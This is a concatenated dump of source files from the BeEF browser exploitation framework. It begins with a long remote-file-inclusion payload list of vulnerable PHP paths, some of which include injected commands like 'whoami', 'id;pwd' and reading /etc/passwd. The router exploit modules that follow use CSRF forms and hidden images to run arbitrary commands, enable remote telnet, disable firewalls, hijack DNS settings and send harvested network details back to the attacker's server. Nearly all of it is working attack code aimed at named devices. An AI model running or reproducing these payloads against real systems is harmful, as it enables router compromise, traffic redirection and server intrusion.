/template/gwb/user_bottom.php?config[template_path]=XXpathXX /template/purpletech/base_include.php?page=XXpathXX? /template/rwb/user_bottom.php?config[template_path]=XXpathXX /template_csv.php?rInfo[content]=XXpathXX /templates/2blue/bodyTemplate.php?serverPath=XXpathXX? /templates/Official/part_userprofile.php?template_path=XXpathXX /templates/barrel/template.tpl.php?renderer=XXpathXX /templates/barrel/template.tpl.php?renderer=XXpathXX? /templates/barry/template.tpl.php?renderer=XXpathXX /templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX /templates/datumVonDatumBis.inc.php?root=XXpathXX /templates/default/header.inc.php?menu=XXpathXX /templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX /templates/default/tpl_message.php?right_file=XXpathXX /templates/footer.inc.php?root=XXpathXX /templates/header.inc.php?root=XXpathXX /templates/mylook/template.tpl.php?renderer=XXpathXX /templates/oerdec/template.tpl.php?renderer=XXpathXX /templates/pb/language/lang_nl.php?temppath=XXpathXX /templates/penguin/template.tpl.php?renderer=XXpathXX /templates/sidebar/template.tpl.php?renderer=XXpathXX /templates/slashdot/template.tpl.php?renderer=XXpathXX /templates/stylesheets.php?root=XXpathXX /templates/text-only/template.tpl.php?renderer=XXpathXX /templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX /theme/breadcrumb.php?rootBase=XXpathXX? /theme/default.php?root=XXpathXX /theme/format.php?_page_content=XXpathXX? /theme/format.php?_page_css=XXpathXX? /theme/frames1.php?root=XXpathXX /theme/frames1_center.php?root=XXpathXX /theme/frames1_left.php?root=XXpathXX /theme/frames1_top.php?root=XXpathXX /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX /theme/settings.php?pfad_z=XXpathXX /theme/test1.php?root=XXpathXX /theme/test2.php?root=XXpathXX /theme/test3.php?root=XXpathXX /theme/test4.php?root=XXpathXX /theme/test5.php?root=XXpathXX /theme/test6.php?root=XXpathXX /themes.php?GLOBALS[theme_path]=XXpathXX? /themes/blackorange.php?root=XXpathXX /themes/container.php?theme_directory=XXpathXX%00 /themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1 /themes/default/preview_post_completo.php?dir=XXpathXX /themes/header.php?theme_directory=XXpathXX%00 /themes/ubb/login.php?theme=XXpathXX /themes/ubb/login.php?theme=XXpathXX? /thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX /timedifference.php?la=XXpathXX /toolbar.loudmouth.php?mainframe=XXpathXX /tools/update_translations.php?_SESSION[path]=XXpathXX? /top.php?laypath=XXpathXX /toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX /topsites/index.php?page=XXpathXX?& /towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX /track.php?path=XXpathXX /tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX? /ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX /twebs/modules/misc/usermods.php?ROOT=XXpathXX /ubbt.inc.php?GLOBALS[thispath]=XXpathXX? /unavailable.php?bibtexrootrel=XXpathXX? /unsubs.php?scdir=XXpathXX /up.php?my[root]=XXpathXX /upload.php?save_path=XXpathXX? /upload/admin/frontpage_right.php?loadadminpage=XXpathXX? /upload/top.php?maindir=XXpathXX? /upload/xax/admin/modules/install_module.php?level=XXpathXX? /upload/xax/admin/patch/index.php?level=XXpathXX? /upload/xax/ossigeno/admin/install_module.php?level=XXpathXX? /upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX? /upload_local.php?target=XXpathXX? /upload_multi.php?target=XXpathXX? /urlinn_includes/config.php?dir_ws=XXpathXX? /user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd /user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX? /user_new_2.php?home=XXpathXX /usr/extensions/get_calendar.inc.php?root_path=XXpathXX /usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd /usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX /utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX /utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX /v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX /vCard/admin/define.inc.php?match=XXpathXX?&cmd=id /vb/includes/functions.php?classfile=XXpathXX /vb/includes/functions_cron.php?nextitem=XXpathXX /vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX /vbgsitemap/vbgsitemap-config.php?base=XXpathXX /vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX /vedit/editor/edit_htmlarea.php?highlighter=XXpathXX? /viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX? /view.php?ariadne=XXpathXX? /view.php?id=XXpathXX /view_func.php?i=XXpathXX&l=testfile.txt? /views/print/printbar.php?views_path=XXpathXX /visible_count_inc.php?statitpath=XXpathXX /visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX?? /volume.php?config[public_dir]=XXpathXX? /vote.php?Madoa=XXpathXX? /votebox.php?VoteBoxPath=XXpathXX /vp/configure.php?phpbb_root_path=XXpathXX? /vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX /w-agora_path/add_user.php?bn_dir_default=XXpathXX? /w-agora_path/create_forum.php?bn_dir_default=XXpathXX? /w-agora_path/create_user.php?bn_dir_default=XXpathXX? /w-agora_path/delete_notes.php?bn_dir_default=XXpathXX? /w-agora_path/delete_user.php?bn_dir_default=XXpathXX? /w-agora_path/edit_forum.php?bn_dir_default=XXpathXX? /w-agora_path/mail_users.php?bn_dir_default=XXpathXX? /w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX? /w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX? /wamp_dir/setup/yesno.phtml?no_url=XXpathXX? /wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX /wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX /wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX /wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX /wapchat/src/eng.forward.php?sysFileDir=XXpathXX /wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX /wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX /wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX /wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX /wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX /wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX /war.php?vwar_root=XXpathXX /warn.php?file=XXpathXX /watermark.php?GALLERY_BASEDIR=XXpathXX /wbxml/WBXML/Decoder.php?base_dir=XXpathXX /wbxml/WBXML/Encoder.php?base_dir=XXpathXX /web/Administration/Includes/configureText.php?path_prefix=XXpathXX /web/Administration/Includes/contentHome.php?path_prefix=XXpathXX /web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX /web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX /web/Administration/Includes/userHome.php?path_prefix=XXpathXX /web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX /web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX /web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX /web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX /web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX /web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX /web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX /web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX /web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX /web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX /web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX /web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX /web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX /web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX /web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX /web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX /web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX /web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX /web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX /web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX /web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX /web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX /web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX /web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX /web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX /web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX /web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX /web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX /web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX /web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX /web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX /web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX /web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX /web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX /web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX /web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX /web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX /web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX /web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX /web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX /web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX /web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX /web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX /web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX /web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX /web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX /web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX /web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX /web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX /web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX /web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX /web/Flickrclient.php?path_prefix=XXpathXX /web/help.php?LIBSDIR=XXpathXX /web/includes/blogger.php?path_prefix=XXpathXX /web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX /web/includes/functions/html_generate.php?path_prefix=XXpathXX /web/includes/functions/validations.php?path_prefix=XXpathXX /web/index.php?LIBSDIR=XXpathXX /web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX /web/login.php?LIBSDIR=XXpathXX /web/logout.php?LIBSDIR=XXpathXX /web/lom.php?ETCDIR=XXpathXX /web/network_module_selector.php?path_prefix=XXpathXX /web/submit_abuse.php?path_prefix=XXpathXX /web/submit_comment.php?path_prefix=XXpathXX /webavis/class/class.php?root=XXpathXX? /webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX /webnews/template.php?content_page=XXpathXX? /webroot/css.php?CONFIGS=XXpathXX /webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX /webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX? /window.php?action=XXpathXX /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX? /work/index.php?g_include=XXpathXX /work/module/forum/forum.php?g_include=XXpathXX /worldpay_notify.php?mosConfig_absolute_path=XXpathXX /wp-cache-phase1.php?plugin=XXpathXX /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX /wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX? /wsk/wsk.php?wsk=XXpathXX /xarg_corner.php?xarg=XXpathXX? /xarg_corner_bottom.php?xarg=XXpathXX? /xarg_corner_top.php?xarg=XXpathXX? /xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2 /xt_counter.php?server_base_dir=XXpathXX /yabbse/Sources/Packages.php?sourcedir=XXpathXX /yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX? /yrch/plugins/metasearch/plug.inc.php?path=XXpathXX /ytb/cuenta/cuerpo.php?base_archivo=XXpathXX /zipndownload.php?PP_PATH=XXpathXX? /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?
beef/modules/exploits/rfi_scanner/update-list
#!/bin/sh echo "[*] Deleting old rfi.txt..." rm rfi.txt echo "[*] Downloading latest rfi.txt..." wget "https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt"
JavaScript
beef/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var path = 'utility.cgi'; var cmd = '<%= @cmd %>'; var timeout = 15; var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'testType', 'value':'1'}, {'type':'hidden', 'name':'IP', 'value':'||'+cmd} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: com_officeconnect_cmd_exec: enable: true category: ["Exploits", "Router"] name: "3COM OfficeConnect Command Execution" description: "Attempts to execute arbitrary commands on a 3Com OfficeConnect ADSL Wireless 11g Firewall Router (OSVDB# 66232).<br/>For more information see, <a href='https://www.andreafabrizi.it/2009/10/18/3COM-OfficeConnect-FirewallRouter-multiple-Vulnerabilities/'>https://www.andreafabrizi.it/2009/10/18/3COM-OfficeConnect-FirewallRouter-multiple-Vulnerabilities/</a>" authors: ["bcoles", "Andrea Fabrizi"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Com_officeconnect_cmd_exec < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/actiontec_q1000_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var user = '<%= @user %>'; var passwd = '<%= @password %>'; var port = '<%= @port %>'; var timeout = 15; var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'serCtlHttp', 'value':'1'}, {'type':'hidden', 'name':'adminUserName', 'value':user}, {'type':'hidden', 'name':'adminPassword', 'value':passwd}, {'type':'hidden', 'name':'remGuiTimeout', 'value':'0'}, {'type':'hidden', 'name':'remGuiPort', 'value':port} ]); var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'serCtlTelnet', 'value':'1'}, {'type':'hidden', 'name':'remTelUser', 'value':user}, {'type':'hidden', 'name':'remTelPass', 'value':passwd}, {'type':'hidden', 'name':'remTelTimeout', 'value':'0'}, {'type':'hidden', 'name':'remTelPassChanged', 'value':'1'} ]); var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'fwLevel', 'value':'Basic'}, {'type':'hidden', 'name':'fwStealthMode', 'value':'0'} ]); var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'ipv6_fwlevel', 'value':'basic'}, {'type':'hidden', 'name':'ipv6_fwenable', 'value':'0'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>); document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>); document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>); document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/actiontec_q1000_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: actiontec_q1000_csrf: enable: true category: ["Exploits", "Router"] name: "Actiontec Q1000 CSRF" description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router." authors: ["james-otten"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/actiontec_q1000_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Actiontec_q1000_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/' }, { 'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF' }, { 'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/argw4_adsl_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/form2Dns.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var argw4_adsl_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsMode', 'value': '1'}, {'type':'hidden', 'name':'dns1', 'value': dns1}, {'type':'hidden', 'name':'dns2', 'value': dns2}, {'type':'hidden', 'name':'dns3', 'value': ''}, {'type':'hidden', 'name':'submit.htm?dns.htm', 'value': 'Send'}, {'type':'hidden', 'name':'save', 'value': 'Apply Changes'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(argw4_adsl_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/argw4_adsl_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/40901/ # beef: module: argw4_adsl_dns_hijack: enable: true category: ["Exploits", "Router"] name: "ARG-W4 ADSL Router DNS Hijack CSRF" description: "Attempts to change the DNS setting on a ARG-W4 ADSL router.<br/><br/>This module has not been tested." authors: ["Mojtaba MobhaM"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/argw4_adsl_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Argw4_adsl_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var path = 'cgi-bin/script?system%20'; var cmd = '<%= @cmd %>'; var img = new Image(); img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); img.id = 'asmax_ar804gu_<%= @command_id %>'; img.src = gateway+path+cmd; document.body.appendChild(img); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(img); } setTimeout("cleanup()", 15000); });
YAML
beef/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: asmax_ar804gu_cmd_exec: enable: true category: ["Exploits", "Router"] name: "Asmax AR-804gu Command Execution" description: "Attempts to execute arbitrary commands on a Asmax AR-804gu (OSVDB# 54895).<br/>For more information see, http://www.securitum.pl/dh/asmax-ar-804-gu-compromise" authors: ["bcoles", "Michal Sajdak"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Asmax_ar804gu_cmd_exec < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/asus_dslx11_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var asus_dslx11_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(asus_dslx11_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/asus_dslx11_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/40373/ # beef: module: asus_dslx11_dns_hijack: enable: true category: ["Exploits", "Router"] name: "ASUS DSL-X11 ADSL Router DNS Hijack" description: "Attempts to change the DNS setting on a ASUS DSL-X11 ADSL router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/asus_dslx11_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Asus_dslx11_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/asus_rt_n12e_get_info/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var target_ip = '<%= @target_ip %>'; load_script = function(url) { var s = document.createElement("script"); s.type = 'text/javascript'; s.src = url; document.body.appendChild(s); } get_info = function() { beef.debug(target_ip + " - gathering info..."); var clients = Client_IP_MAC; var wanip = wanlink_ipaddr(); var netmask = wanlink_netmask(); var gateway = wanlink_gateway(); var dns = wanlink_dns(); beef.debug(target_ip + " - Clients: " + clients); beef.debug(target_ip + " - WAN IP: " + wanip); beef.debug(target_ip + " - Gateway: " + gateway); beef.debug(target_ip + " - DNS: " + dns); beef.debug(target_ip + " - gathering info completed"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip=" + target_ip + "&clients=" + clients + "&wanip=" + wanip + "&netmask=" + netmask + "&gateway=" + gateway + "&dns=" + dns ); } beef.debug(target_ip + " - loading scripts..."); load_script("http://" + target_ip + "/status.asp"); load_script("http://" + target_ip + "/get_wan_status.asp"); setTimeout("get_info()", 10000); });
YAML
beef/modules/exploits/router/asus_rt_n12e_get_info/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: asus_rt_n12e_get_info: enable: true category: ["Exploits", "Router"] name: "Asus RT-N12E Get Info" description: "This module retrieves network information from Asus RT-N12E routers, including WAN link details (WAN IP address, gateway, DNS server) and the MAC address and IP address of all connected clients.<br/>Tested on Firmware version 2.0.0.35." authors: ["bcoles"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/asus_rt_n12e_get_info/module.rb
